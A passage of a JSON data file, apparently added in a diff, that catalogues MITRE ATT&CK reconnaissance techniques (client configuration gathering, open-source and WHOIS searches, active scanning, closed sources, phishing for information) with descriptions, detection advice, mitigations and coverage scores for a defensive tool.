Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.004", + "name": "Gather Victim Host Information: Client Configurations", + "url": "https://attack.mitre.org/techniques/T1592/004", + "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05476190476190476, + "adjusted_score": 0.05476190476190476, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1593", + "name": "Search Open Websites/Domains", + "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "url": "https://attack.mitre.org/techniques/T1593", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1593.001", + "name": "Search Open Websites/Domains: Social Media", + "url": "https://attack.mitre.org/techniques/T1593/001", + "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1593.002", + "name": "Search Open Websites/Domains: Search Engines", + "url": "https://attack.mitre.org/techniques/T1593/002", + "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05, + "adjusted_score": 0.05, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1594", + "name": "Search Victim-Owned Websites", + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "url": "https://attack.mitre.org/techniques/T1594", + "tactics": [ + "Reconnaissance" + ], + "detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Application Log: Application Log Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0656047619047619, + "adjusted_score": 0.0656047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1595", + "name": "Active Scanning", + "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "url": "https://attack.mitre.org/techniques/T1595", + "tactics": [ + "Reconnaissance" + ], + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1595.001", + "name": "Active Scanning: Scanning IP Blocks", + "url": "https://attack.mitre.org/techniques/T1595/001", + "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1595.002", + "name": "Active Scanning: Vulnerability Scanning", + "url": "https://attack.mitre.org/techniques/T1595/002", + "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.08271904761904762, + "adjusted_score": 0.08271904761904762, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "18.2,18.3" + ], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1596", + "name": "Search Open Technical Databases", + "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "url": "https://attack.mitre.org/techniques/T1596", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1596.001", + "name": "Search Open Technical Databases: DNS/Passive DNS", + "url": "https://attack.mitre.org/techniques/T1596/001", + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.002", + "name": "Search Open Technical Databases: WHOIS", + "url": "https://attack.mitre.org/techniques/T1596/002", + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.003", + "name": "Search Open Technical Databases: Digital Certificates", + "url": "https://attack.mitre.org/techniques/T1596/003", + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.004", + "name": "Search Open Technical Databases: CDNs", + "url": "https://attack.mitre.org/techniques/T1596/004", + "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1596.005", + "name": "Search Open Technical Databases: Scan Databases", + "url": "https://attack.mitre.org/techniques/T1596/005", + "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05, + "adjusted_score": 0.05, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1597", + "name": "Search Closed Sources", + "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "url": "https://attack.mitre.org/techniques/T1597", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1597.001", + "name": "Search Closed Sources: Threat Intel Vendors", + "url": "https://attack.mitre.org/techniques/T1597/001", + "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1597.002", + "name": "Search Closed Sources: Purchase Technical Data", + "url": "https://attack.mitre.org/techniques/T1597/002", + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05, + "adjusted_score": 0.05, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1598", + "name": "Phishing for Information", + "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently 